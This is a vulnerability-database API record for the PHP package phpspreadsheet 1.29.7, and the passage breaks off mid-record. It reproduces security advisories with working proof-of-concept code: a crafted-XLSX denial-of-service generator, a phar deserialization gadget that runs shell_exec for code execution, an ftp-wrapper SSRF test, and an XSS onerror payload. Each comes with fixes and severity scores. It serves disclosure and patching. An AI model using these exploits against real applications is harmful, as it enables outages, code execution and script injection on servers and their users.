{"url":"http://public2.vulnerablecode.io/api/packages/83679?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@1.29.7","type":"composer","namespace":"phpoffice","name":"phpspreadsheet","version":"1.29.7","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"1.30.4","latest_non_vulnerable_version":"5.7.0","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90253?format=json","vulnerability_id":"VCID-dzsc-krs5-kkhp","summary":"PhpSpreadsheet has CPU Denial of Service via Unbounded Row Number in XLSX Row Dimensions\n## Summary\n\nThe XLSX reader's `ColumnAndRowAttributes::readRowAttributes()` method reads row numbers from XML attributes without validating them against the spreadsheet maximum row limit (`AddressRange::MAX_ROW = 1,048,576`). An attacker can craft a minimal XLSX file (~1.6KB) containing a `<row r=\"999999999\"/>` element that inflates `cachedHighestRow` to 999,999,999, causing any subsequent row iteration to attempt ~1 billion loop cycles and exhaust CPU resources.\n\n## Details\n\nIn `src/PhpSpreadsheet/Reader/Xlsx/ColumnAndRowAttributes.php` at line 216, the row index is cast directly from XML without bounds checking:\n\n```php\n// ColumnAndRowAttributes.php:216\n$rowIndex = (int) $row['r'];  // No validation against AddressRange::MAX_ROW\n```\n\nThis value flows through `setRowAttributes()` (line 126) → `$this->worksheet->getRowDimension($rowNumber)` (line 60), which updates the cached highest row in `Worksheet.php:1348`:\n\n```php\n// Worksheet.php:1342-1349\npublic function getRowDimension(int $row): RowDimension\n{\n    if (!isset($this->rowDimensions[$row])) {\n        $this->rowDimensions[$row] = new RowDimension($row);\n        $this->cachedHighestRow = max($this->cachedHighestRow, $row);\n    }\n    return $this->rowDimensions[$row];\n}\n```\n\nThe inflated `cachedHighestRow` is then returned by `getHighestRow()` (line 1099) and used as the default end bound in 
`RowIterator::resetEnd()` (RowIterator.php:86):\n\n```php\n// RowIterator.php:86\n$this->endRow = $endRow ?: $this->subject->getHighestRow();\n```\n\nNotably, column attributes already have equivalent validation at line 161 (`AddressRange::MAX_COLUMN_INT`), and cell coordinates are validated in `Coordinate::coordinateFromString()` (line 40) against `MAX_ROW`. The row dimension attribute path bypasses both of these checks.\n\n## PoC\n\n**Step 1: Create the malicious XLSX file (~1.6KB)**\n\n```python\nimport zipfile\nimport io\n\ncontent_types = '<?xml version=\"1.0\" encoding=\"UTF-8\"?><Types xmlns=\"http://schemas.openxmlformats.org/package/2006/content-types\"><Default Extension=\"rels\" ContentType=\"application/vnd.openxmlformats-package.relationships+xml\"/><Default Extension=\"xml\" ContentType=\"application/xml\"/><Override PartName=\"/xl/workbook.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml\"/><Override PartName=\"/xl/worksheets/sheet1.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml\"/></Types>'\n\nrels = '<?xml version=\"1.0\" encoding=\"UTF-8\"?><Relationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\"><Relationship Id=\"rId1\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument\" Target=\"xl/workbook.xml\"/></Relationships>'\n\nworkbook = '<?xml version=\"1.0\" encoding=\"UTF-8\"?><workbook xmlns=\"http://schemas.openxmlformats.org/spreadsheetml/2006/main\" xmlns:r=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships\"><sheets><sheet name=\"Sheet1\" sheetId=\"1\" r:id=\"rId1\"/></sheets></workbook>'\n\nwb_rels = '<?xml version=\"1.0\" encoding=\"UTF-8\"?><Relationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\"><Relationship Id=\"rId1\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet\" 
Target=\"worksheets/sheet1.xml\"/></Relationships>'\n\nsheet = '<?xml version=\"1.0\" encoding=\"UTF-8\"?><worksheet xmlns=\"http://schemas.openxmlformats.org/spreadsheetml/2006/main\"><sheetData><row r=\"1\"><c r=\"A1\"><v>1</v></c></row><row r=\"999999999\" ht=\"15\"/></sheetData></worksheet>'\n\nwith zipfile.ZipFile('dos_row.xlsx', 'w', zipfile.ZIP_DEFLATED) as zf:\n    zf.writestr('[Content_Types].xml', content_types)\n    zf.writestr('_rels/.rels', rels)\n    zf.writestr('xl/workbook.xml', workbook)\n    zf.writestr('xl/_rels/workbook.xml.rels', wb_rels)\n    zf.writestr('xl/worksheets/sheet1.xml', sheet)\n\nprint(\"Created dos_row.xlsx\")\n```\n\n**Step 2: Load with PhpSpreadsheet (CPU exhaustion)**\n\n```php\n<?php\nrequire 'vendor/autoload.php';\n\nuse PhpOffice\\PhpSpreadsheet\\IOFactory;\n\n$reader = IOFactory::createReader('Xlsx');\n$spreadsheet = $reader->load('dos_row.xlsx');\n$sheet = $spreadsheet->getActiveSheet();\n\necho \"Highest row: \" . $sheet->getHighestRow() . \"\\n\";\n// Output: Highest row: 999999999\n\n// This will consume CPU for ~144 seconds (999M iterations)\nforeach ($sheet->getRowIterator() as $row) {\n    // CPU exhaustion\n}\n```\n\n**Expected output:** `getHighestRow()` returns 999999999. Any row iteration hangs indefinitely.\n\n## Impact\n\n- **CPU Denial of Service:** A 1.6KB crafted XLSX file causes ~999 million loop iterations in any application that iterates rows using `getRowIterator()` or uses `getHighestRow()` as a loop bound. 
Estimated CPU burn is ~144 seconds per file.\n- **Memory Exhaustion:** Applications that accumulate data during iteration (e.g., importing rows into a database, building arrays) will also exhaust memory.\n- **Amplification:** The ratio of input size to resource consumption is extreme — 1,580 bytes triggers nearly 1 billion iterations.\n- **Common Attack Surface:** PhpSpreadsheet is widely used in web applications that accept user-uploaded spreadsheets for import/processing, making this easily exploitable remotely.\n\n## Recommended Fix\n\nAdd row bounds validation in `readRowAttributes()` at line 216, matching the column validation pattern already present at line 161:\n\n```php\n// src/PhpSpreadsheet/Reader/Xlsx/ColumnAndRowAttributes.php:216\n// Before:\n$rowIndex = (int) $row['r'];\n\n// After:\n$rowIndex = (int) $row['r'];\nif ($rowIndex < 1 || $rowIndex > AddressRange::MAX_ROW) {\n    continue;\n}\n```\n\nThe `AddressRange` import is already present at line 5 of this file. This fix is consistent with the existing cell coordinate validation in `Coordinate::coordinateFromString()` and the column validation at line 
161.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40902","reference_id":"","reference_type":"","scores":[{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.17525","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.17629","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.17623","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.1759","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.1751","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40902"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/PHPOffice/PhpSpreadsheet"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-7c6m-4442-2x6m","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-13T12:11:26Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-7c6m-4442-2x6m"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40902","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual
","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40902"},{"reference_url":"https://github.com/advisories/GHSA-7c6m-4442-2x6m","reference_id":"GHSA-7c6m-4442-2x6m","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7c6m-4442-2x6m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110319?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@1.30.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@1.30.4"},{"url":"http://public2.vulnerablecode.io/api/packages/110318?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.1.16","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.1.16"},{"url":"http://public2.vulnerablecode.io/api/packages/110317?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.4.5","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.4.5"},{"url":"http://public2.vulnerablecode.io/api/packages/110316?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@3.10.5","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@3.10.5"},{"url":"http://public2.vulnerablecode.io/api/packages/110315?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@5.7.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@5.7.0"}],"aliases":["CVE-2026-40902","GHSA-7c6m-4442-2x6m"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dzsc-krs
5-kkhp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89504?format=json","vulnerability_id":"VCID-g5n6-3aer-gkgd","summary":"PhpSpreadsheet has SSRF/RCE in IOFactory::load when $filename is user controlled\nThe usage of `is_file`, used to verify if the `$filename` is indeed an actual file, by all(?) `Reader` implementations (inside the helper function `File::assertFile`) is php-wrapper aware, for any [php wrappers](https://www.php.net/manual/en/wrappers.php) implementing `stat()`.\nThe 3 wrappers `ftp://`, `phar://` and `ssh2.sftp://` all satisfy this requirement - 2 of which are shown in the PoC below.\n\nThis results in an SSRF, at \"best\", and RCE at worst.\n\nThis was tested against the `latest` release - but the issue seems to go back a while from a first quick check (still present in `v1.30.2`).\n\n## PoC\nTo reproduce the vulnerable behavior, the following scripts were used:\n\n`php.ini` file, only needed to build the malicious phar, not necessary to exploit on a deployed instance of the library:\n```ini\nphar.readonly=0\n```\n\n`make_phar.php` to create the malicious file:\n```php\n<?php\n// php -c php.ini make_phar.php\nclass GadgetClass {\n    public $data;\n    function __construct($d) {\n        $this->data = $d;\n    }\n    function __destruct() {\n        shell_exec($this->data);\n    }\n}\n\n$pop = new GadgetClass('touch /tmp/poc.txt');\n\n$phar = new Phar('exploit.phar');\n$phar->startBuffering();\n$phar->setStub('<?php __HALT_COMPILER(); ?>');\n$phar->addFromString('whatever', 'dummy content');\n$phar->setMetadata($pop);\n$phar->stopBuffering();\n\nrename('exploit.phar', 'exploit.xlsx'); // optional\necho \"exploit.xlsx created \\n\";\n\n```\n\n`test.php` showcases the unsafe pattern:\n```php\n<?php\nrequire 'vendor/autoload.php';\n\nuse PhpOffice\\PhpSpreadsheet\\IOFactory;\n\nclass GadgetClass {\n    public $data;\n    function __construct($d) {\n        $this->data = $d;\n    }\n    function __destruct() {\n        
shell_exec($this->data);\n    }\n}\n\n$filename = $argv[1] ?? null;\n\nif (!$filename) {\n    echo \"Usage: php test.php <path>\\n\";\n    echo \"  e.g. php test.php phar://exploit.xlsx/whatever\\n\";\n    exit(1);\n}\n\necho \"Calling IOFactory::load('\" . $filename . \"')\\n\";\n\ntry {\n    $spreadsheet = IOFactory::load($filename);\n    var_dump($spreadsheet);\n} catch (Throwable $e) {\n    echo \"Vuln has still triggered even if exception triggers.\\n\";\n}\n\n\n```\n### RCE \nRun the PoC (for RCE):\n```bash\nphp -c php.ini make_phar.php && php test.php phar://exploit.xlsx/test; ls -lah /tmp/poc.txt\n```\nThe file `/tmp/poc.txt` should now be present on disk.\n> Note: the vuln still triggers if the file pointed to inside the phar does not exist/is not supported (html, xlsx, etc...). This means an attacker could \"silently\" trigger the vuln without leaving any error logs if the file inside the phar exists and is supported instead. \n\n### SSRF\nRun the PoC (for SSRF):\n```bash\nncat -lvp 21 #run on another terminal\nphp test.php ftp://127.0.0.1:21/test\n```\n\nObserve a connection is made to `127.0.0.1` on port `21`.\n\n\n\n## Root Cause Analysis \n\nFollowing the API exposed by the library, using `IOFactory::load`, the code proceeds as follows:\n```php\nIOFactory::load($filename) -> IReader::load($filename, $flags) -> IReader::loadSpreadsheetFromFile($filename) ->  File::assertFile($filename, ...) 
-> is_file($filename);\n```\n\n\nThe one obvious gadget that was found is guarded via `__unserialize` (or `__wakeup` in older versions) in the `XMLWriter` class, making it impossible to use the phar deserialization as a standalone attack vector using just this library - it is still viable to create \"POP\" gadget chains via other classes which may be available in real-world deployment scenarios.\n\n```php\n    public function __destruct()\n    {\n        // Unlink temporary files\n        // There is nothing reasonable to do if unlink fails.\n        if ($this->tempFileName != '') {\n            @unlink($this->tempFileName);\n        }\n    }\n\n    /** @param mixed[] $data */\n    public function __unserialize(array $data): void\n    {\n        $this->tempFileName = '';\n\n        throw new SpreadsheetException('Unserialize not permitted');\n    }\n```\n\nPhpSpreadsheet is used as a backbone for many library wrappers, including very widespread ones from [packagist](https://packagist.org) like `maatwebsite/excel` for Laravel, `sonata-project/exporter` and so on, hence the deserialization vector stays relevant in other contexts.\n\n## Suggested mitigations\n\nUse `is_file` only after making sure the filename does not contain any php wrapper:\n```php\n$scheme = parse_url($filename, PHP_URL_SCHEME);\n// strlen check > 1 to avoid issues with Windows absolute paths (e.g. 
C:\\...), Windows quirks :)\n// since no built-in or commonly registered PHP stream wrapper uses a single-character scheme, this should be ok, to my knowledge\nif ($scheme !== null && strlen($scheme) > 1) {\n    throw new \\PhpOffice\\PhpSpreadsheet\\Exception(\n        \"Stream wrappers are not permitted as file paths: {$filename}\"\n    );\n}\n```\n\nor perhaps even just passing it to `realpath` before calling `is_file` to ensure it is parsed correctly:\n```php\n$real = realpath($filename); // not php wrapper aware AFAIK\nif ($real === false) {\n    throw new \\PhpOffice\\PhpSpreadsheet\\Exception(\"Invalid file path: {$filename}\");\n}\n\n// from here on, $real should be a clean absolute path so we can pass it to is_file()\nif (!is_file($real)) {\n    throw new ...\n}\n```\n\n> Note: `stream_is_local()` would also not be safe here — as it considers `phar://` to be local and would not block it.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34084","reference_id":"","reference_type":"","scores":[{"value":"0.00226","scoring_system":"epss","scoring_elements":"0.45444","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00243","scoring_system":"epss","scoring_elements":"0.47812","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00243","scoring_system":"epss","scoring_elements":"0.478","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00243","scoring_system":"epss","scoring_elements":"0.4783","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00243","scoring_system":"epss","scoring_elements":"0.47847","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34084"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet","reference_id":"","reference_type":"","scores":[{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github
.com/PHPOffice/PhpSpreadsheet"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-q4q6-r8wh-5cgh","reference_id":"","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-05T19:32:56Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-q4q6-r8wh-5cgh"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34084","reference_id":"","reference_type":"","scores":[{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34084"},{"reference_url":"https://www.php.net/manual/en/wrappers.php","reference_id":"","reference_type":"","scores":[{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.php.net/manual/en/wrappers.php"},{"reference_url":"https://github.com/advisories/GHSA-q4q6-r8wh-5cgh","reference_id":"GHSA-q4q6-r8wh-5cgh","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q4q6-r8wh-5cgh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110708?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@1.30.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-
w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@1.30.3"},{"url":"http://public2.vulnerablecode.io/api/packages/110707?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.1.15","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.1.15"},{"url":"http://public2.vulnerablecode.io/api/packages/110706?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.4.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.4.4"},{"url":"http://public2.vulnerablecode.io/api/packages/110704?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@3.10.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@3.10.4"},{"url":"http://public2.vulnerablecode.io/api/packages/110703?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@5.6.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@5.6.0"}],"aliases":["CVE-2026-34084","GHSA-q4q6-r8wh-5cgh"],"risk_scor
e":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-g5n6-3aer-gkgd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89404?format=json","vulnerability_id":"VCID-jw3b-hm9c-sbd2","summary":"PhpSpreadsheet has XSS via NumberFormat @ Text Substitution in HTML Writer\n### Summary\nThe HTML Writer in PhpSpreadsheet bypasses `htmlspecialchars()` output escaping when a cell uses a custom number format containing the `@` text placeholder with additional literal text (e.g., `@ \"items\"` or `\"Total: \"@`). This allows an attacker to inject arbitrary HTML and JavaScript into the generated HTML output by crafting a malicious XLSX file.\n\n### Details\n\n\n#### 1. Conditional escaping in `Html.php:1586-1594`\n\n```php\n$cellData = NumberFormat::toFormattedString(\n    $origData2,\n    $formatCode ?? NumberFormat::FORMAT_GENERAL,\n    [$this, 'formatColor']\n);\n\nif ($cellData === $origData) {\n    $cellData = htmlspecialchars($cellData, Settings::htmlEntityFlags());\n}\n```\n\n`htmlspecialchars()` is only called when `$cellData === $origData` (strict comparison). If the formatted output differs from the original value in any way, escaping is skipped entirely.\n\n#### 2. Early return in `Formatter.php:136-152`\n\n```php\nif (preg_match(self::SECTION_SPLIT, $format) === 0\n    && preg_match(self::SYMBOL_AT, $formatx) === 1) {\n    if (!str_contains($format, '\"')) {\n        return str_replace('@', /* raw value */, $format);\n    }\n    return str_replace(/* ... preg_replace with raw value ... 
*/);\n}\n```\n\nWhen the format code contains `@` with additional literal text (e.g., `@ \"items\"`), the formatter substitutes the raw cell value into the format string and **returns early** — the `formatColor` callback (which would have applied `htmlspecialchars`) is never invoked.\n\n\n### PoC\n\n**test.php**\n``` php\n<?php\n\nrequire '/app/vendor/autoload.php';\n\nuse PhpOffice\\PhpSpreadsheet\\Spreadsheet;\nuse PhpOffice\\PhpSpreadsheet\\Writer\\Html;\n\n$spreadsheet = new Spreadsheet();\n$sheet = $spreadsheet->getActiveSheet();\n\n$payload    = '<img src=x onerror=alert(document.domain)>';\n$formatCode = '@ \"items\"';\n\n\n$sheet->setCellValue('A1', $payload);\n$sheet->getStyle('A1')->getNumberFormat()->setFormatCode($formatCode);\n\n$writer = new Html($spreadsheet);\n$html = $writer->generateHTMLAll();\n\nfile_put_contents('/app/output.html', $html);\n\necho \"HTML output saved to /app/output.html\\n\";\n```\n\nThe produced output contains unescaped data.\n``` html\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\n  <head>\n      <meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\n      <meta name=\"generator\" content=\"PhpSpreadsheet, https://github.com/PHPOffice/PhpSpreadsheet\" />\n      <title>Untitled Spreadsheet</title>\n      <meta name=\"author\" content=\"Unknown Creator\" />\n      <meta name=\"title\" content=\"Untitled Spreadsheet\" />\n      <meta name=\"lastModifiedBy\" content=\"Unknown Creator\" />\n      <meta name=\"created\" content=\"2026-04-02T16:34:44+00:00\" />\n      <meta name=\"modified\" content=\"2026-04-02T16:34:44+00:00\" />\n    <style type=\"text/css\">\n[..SNIP..]\n    </style>\n  </head>\n\n  <body>\n<div style='page: page0'>\n    <table border='0' cellpadding='0' cellspacing='0' id='sheet0' class='sheet0 gridlines'>\n        <col class=\"col0\" />\n        <tbody>\n          <tr 
class=\"row0\">\n            <td class=\"column0 style1 s\"><img src=x onerror=alert(document.domain)> items</td>\n          </tr>\n    </tbody></table>\n</div>\n  </body>\n</html>\n```\n\n### Impact\n\nThe impact changes based on the way the HTML is served.\nIf it is served from the web server, it is a typical XSS; if the file is downloaded and opened locally, the attack vector is more limited.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35453","reference_id":"","reference_type":"","scores":[{"value":"0.0001","scoring_system":"epss","scoring_elements":"0.01246","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.0167","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01674","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01683","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01682","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35453"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/PHPOffice/PhpSpreadsheet"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-6wpp-88cp-7q68","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/A
V:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T14:27:23Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-6wpp-88cp-7q68"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35453","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35453"},{"reference_url":"https://github.com/advisories/GHSA-6wpp-88cp-7q68","reference_id":"GHSA-6wpp-88cp-7q68","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6wpp-88cp-7q68"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110319?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@1.30.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@1.30.4"},{"url":"http://public2.vulnerablecode.io/api/packages/110318?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.1.16","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.1.16"},{"url":"http://public2.vulnerablecode.io/api/packages/110317?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.4.5","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.4.
5"},{"url":"http://public2.vulnerablecode.io/api/packages/110316?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@3.10.5","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@3.10.5"},{"url":"http://public2.vulnerablecode.io/api/packages/110315?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@5.7.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@5.7.0"}],"aliases":["CVE-2026-35453","GHSA-6wpp-88cp-7q68"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jw3b-hm9c-sbd2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89275?format=json","vulnerability_id":"VCID-qz8g-w1uw-c7bb","summary":"PhpSpreadsheet has XSS via number format code with @ text placeholder bypasses htmlspecialchars in HTML writer\nIt was discovered that there is a way to bypass HTML escaping in the HTML writer using custom number format codes.\n\n## The Problem\n\nIn `Writer/Html.php` around line 1592, the code checks if the formatted cell data equals the original data to decide whether to apply `htmlspecialchars()`:\n\n```php\nif ($cellData === $origData) {\n    $cellData = htmlspecialchars($cellData, 